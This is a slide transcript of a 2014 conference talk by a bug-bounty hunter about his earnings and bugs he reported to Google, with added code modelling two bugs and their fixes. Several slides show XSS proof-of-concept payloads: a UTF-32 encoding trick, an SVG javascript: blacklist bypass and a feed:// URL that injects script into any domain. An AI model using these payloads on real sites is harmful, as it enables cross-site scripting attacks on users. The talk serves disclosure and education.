CODE BLUE 2014 : Joy of a bug hunter by Masato Kinugawa
Recently, the number of enterprises which pay rewards for reporting security bugs is increasing. I have also received a large amount of rewards through the reward programs for reporting bugs. Actually, I earn a living with rewards, so it is not an exaggeration to say that I am a professional bug hunter. I will give a speech on topics such as how to be a professional bug hunter, the actual rules from the point of view of an active participant, and how to discover vulnerabilities, including technical topics.
  1. Bug-hunter's Joy. Masato Kinugawa
  2. Name: Masato Kinugawa. Nationality: Japanese (maybe). Hobby: Listening to music and XSS. Profession: Bug-hunter
  3. First: Bug-Hunter's Life and Bounty Program. Second: Delightful Bugs. Third: The reasons why I became a Bug-hunter
  4. Bug-hunter's Life and Bounty Program
  5. Workplace: Home. Working Hours: Any time I want. Work: Finding Security Bugs. Income: Bug Bounty ➡ Does it make enough money to live?
  6. 27135346 (JPY) = $142723 ($1 = 120 JPY)
  7. 27135346 (JPY) = $142723 ($1 = 120 JPY) (in Octal digits)
  8. • Google launched in 2010
      • Followed by Many Companies
  9. • Google Vulnerability Reward Program
      • 1 bug = $100~20,000
      $130,803.7 Total Bounties. Number of bugs reported: 127 (191 including duplicated and/or not rewarded ones)
  10. Even more motivated by the increased bounty rates! $
  11. I am actually a night owl…
  12. • Quick response since the program was launched.
      • Consider NOT ONLY seriousness, but also the level of "interesting" of the bug.
      • Require only a simple explanation to have them understand the problem.
      • Provide fun to the reporters.
  13. • The Most Important Domain of Google
      • Bounty was $5,000 (Exceeds the regulated maximum amount at that time)
  14. https://accounts.google.com/example?oe=utf-32
      HTTP/1.1 200 OK
      Alternate-Protocol: 443:quic,p=0.01
      Cache-Control: private, max-age=0
      Content-Encoding: gzip
      Content-Type: text/html; charset=UTF-32
      ...
      • Character Code can be set by URL
      • UTF-32 was able to be set
  15. ∀㸀㰀script㸀alert(1)㰀/script㸀
  16. ➊ Array of the Bytes ❷ Character Code of the Page ❸ Handling 0x00 Characters
  17. In UTF-32, 1 character requires 4 bytes ➊
      00 00 22 00 00 00 3E 00 00 00 3C 00
      00 00 00 73 00 00 00 63 00 00 00 72
      00 00 00 69 00 00 00 70 00 00 00 74
      00 00 3E 00 00 00 00 61 00 00 00 6C
      00 00 00 65 00 00 00 72 00 00 00 74
      00 00 00 28 00 00 00 31 00 00 00 29
      00 00 3C 00 00 00 00 2F 00 00 00 73
      00 00 00 63 00 00 00 72 00 00 00 69
      00 00 00 70 00 00 00 74 00 00 3E 00
      Rendered: ∀㸀㰀script㸀alert(1)㰀/script㸀
  18. IE does not support UTF-32 ➡ Character Code shall be "recognized" to be something ❷
      (the same byte array as slide 17, rendered as ∀㸀㰀script㸀alert(1)㰀/script㸀)
  19. This "super great" web site provides the support status of character codes of all web browsers: http://l0.cm/encodings/table/
  20. IE (<=9) ignores the characters ➡ the "00" are understood as nothing. ❸
      (the same byte array as slide 17, now rendered as "><script>alert(1)</script>)
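The byte-level trick on slides 14 to 20, as an added example that is not part of the original slides: it encodes the slide-15 string in UTF-32BE, shows that a conforming decoder returns the harmless characters the server escaped correctly, while a decoder that drops 0x00 bytes (modelling the IE <= 9 behaviour described) sees markup. The charset allow-list at the end is an assumed server-side mitigation, not Google's code.

```javascript
// Added example (not from the slides). The payload uses U+2200, U+3E00 and
// U+3C00 instead of '"', '>' and '<': at the character level they are not
// markup, so an HTML escaper lets them through, but their UTF-32BE encoding
// contains the bytes 0x22, 0x3E and 0x3C surrounded by 0x00.
const PAYLOAD = "\u2200\u3E00\u3C00script\u3E00alert(1)\u3C00/script\u3E00";

// Encode a string as UTF-32BE: four big-endian bytes per code point.
function utf32be(str) {
  const cps = Array.from(str, (c) => c.codePointAt(0));
  const buf = Buffer.alloc(cps.length * 4);
  cps.forEach((cp, i) => buf.writeUInt32BE(cp, i * 4));
  return buf;
}

// A conforming UTF-32BE decoder gives the original characters back.
function decodeUtf32be(buf) {
  let out = "";
  for (let i = 0; i + 4 <= buf.length; i += 4) out += String.fromCodePoint(buf.readUInt32BE(i));
  return out;
}

// Model of the IE (<=9) behaviour on the slides: the UTF-32 label is not
// recognised and every 0x00 byte is treated as nothing, so the remaining
// bytes are read as single-byte text.
function legacyIeView(buf) {
  return Buffer.from([...buf].filter((b) => b !== 0)).toString("latin1");
}

// Hex dump in the slides' layout (12 bytes per row) for inspection.
function hexRows(buf, perRow = 12) {
  const rows = [];
  for (let i = 0; i < buf.length; i += perRow) {
    const row = [...buf.subarray(i, i + perRow)];
    rows.push(row.map((b) => b.toString(16).toUpperCase().padStart(2, "0")).join(" "));
  }
  return rows;
}

// Assumed mitigation (not the site's real code): only honour a client-chosen
// output encoding when it is on an allow-list of charsets that every
// supported browser decodes the same way; anything else falls back to UTF-8.
const ALLOWED_CHARSETS = new Set(["utf-8", "shift_jis", "euc-jp", "iso-2022-jp"]);
function responseCharset(oeParam) {
  const label = String(oeParam || "utf-8").trim().toLowerCase();
  return ALLOWED_CHARSETS.has(label) ? label : "utf-8";
}
```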
  21. Message from the web page
  22. Seek browser and plug-in bugs also
  23. • 28.7% of the total number of bugs I reported
      • 87% of them are with IE
  24. • Take longer to fix
      • Even if it is fixed, it is NOT likely to be applied to the different IE versions.
      Therefore: something is required at the Web service level
  25. location.href is a method to get the URL of the page by JavaScript. For http://example.com/, location.href is http://example.com/
  26. For http://evil%2F@example.com/, location.href is http://evil/@example.com/. The URL part before @ is automatically decoded! ➡ It generates a URL that points to an external Web site
  27. Therefore: all code including location.href pointing to the self-domain is potentially vulnerable. Added characters before "@", then checked whether any web pages send a request to external sites
  28. http://evil%2F@www.youtube.com/
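The location.href behaviour on slides 25 to 28 and the check a defender would add, as an added example that is not part of the original slides: the percent-decoding of the part before "@" is simulated on top of Node's WHATWG URL parser (current parsers keep %2F encoded), and the isSameOriginHref and selfUrl helpers are assumed mitigations, not the sites' own code.

```javascript
// Added example (not from the slides). Model of the behaviour described:
// the userinfo part (before "@") of location.href comes back percent-decoded,
// so "evil%2F" turns into "evil/". Simulated here on top of the WHATWG parser.
function legacyLocationHref(href) {
  const u = new URL(href);
  if (!u.username && !u.password) return href;
  let cred = decodeURIComponent(u.username);
  if (u.password) cred += ":" + decodeURIComponent(u.password);
  return `${u.protocol}//${cred}@${u.host}${u.pathname}${u.search}${u.hash}`;
}

// Which host does a request built from a given href string actually go to?
// After decoding, "http://evil/@example.com/" has host "evil" and the rest
// of the old authority becomes the path.
function effectiveHost(href) {
  return new URL(href).host;
}

// Defender's check (assumed helper): refuse any URL that carries credentials
// and require the expected origin when the string is parsed again.
function isSameOriginHref(href, expectedOrigin) {
  const u = new URL(href);
  if (u.username || u.password) return false;
  return u.origin === expectedOrigin;
}

// Hardened self-URL builder (assumed helper): rebuild from origin + path
// instead of copying location.href, so nothing before "@" is ever carried
// into a generated URL.
function selfUrl(href) {
  const u = new URL(href);
  return u.origin + u.pathname + u.search + u.hash;
}
```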
  29. • Found a fatal bug at the same time
      • Exists in the feed:// URL that represents RSS
      • Can extract an unrelated feed to any domain by customizing the part of the URL before @.
      • Put scripts in the unrelated feed, and XSS works on the extracted domain.
      Therefore: we can enforce XSS on any web site \(^o^)/ yeah☆
  30. Things to do: in the feed:// URL, characters which can run scripts are restricted (= Blacklist). It is easy; just pass through the blacklist!
  31. <a href="javascript:alert(1)">XSS</a> becomes <a>XSS</a>. Find out the characters which can pass through, based on the character removal pattern. Beeping!
  32. <svg>
       <a xmlns:xlink="http://www.w3.org/1999/xlink"
        xlink:href="javascript:alert(1)">
        <rect width="1000" height="1000" />
       </a>
      </svg>
      Silence…
  33. feed://l0.cm%2Fcb.rss%3F@codeblue.jp/
  34. feed://l0.cm%2Fcb.rss%3F@codeblue.jp/
      alert('CODE BLUE、2回目開催おめでとう!\n'+document.domain+'から')
      (Congratulations for the 2nd Code Blue)
  35. • Web applications are in jeopardy caused by character codes, browser behaviors / bugs, and so on…
      • Finding out mysteriously complicated bugs is the ultimate delight.
      You want to see more? http://masatokinugawa.l0.cm/
  36. • Grew up in touch with computers.
      • Love to disassemble anything
      • Debut as XSS "attacker" in the 6th grade
  37. • Grew up in touch with computers. ➡ I got to know what binary is in 2009
      • Love to disassemble anything ➡ Don't love to do it (so much)
      • Debut as XSS "attacker" in the 6th grade ➡ I got interested in security in 2009
  38. Decided to do what I want, in my way. ~2009: A lot happened. 2010: Left computer vocational school
  39. What I want to do: Seeking vulnerabilities. Found so many! Soon after, Google launched the bug bounty program. Spent all waking hours finding vulnerabilities.
  40. Bug hunting house-husband? ➡ Need to gain girl hunt skill also ☺
      • Extension of what I want to do
      • Found myself as a bug-hunter, one day
      Wish for the future…
  41. • Must spend most of the time repeating unsophisticated verification tests
      • No income unless I find anything
      • Feeling accomplishment is great, as what I achieved directly becomes money
      • Nothing in the world to feel delight like treasure hunting.
      • Abnormal behaviors are much fun to see
      However…
  42. The finding skill is all that you need: can concentrate on improving skill. Can do by yourself: almost no human relationship issues. Can do at your home: no commuting time. Can work at own pace: can do when you want
  43. "Listen to music" as a hobby. "Bug-hunt" as a hobby (same as above). "Hobby": Do anything you want! Then, you may find your own way. For those who are trying to find your way...
  44. Understood?!
  45. Thank You! @kinugawamasato ✉ masatokinugawa [at] gmail.com Contact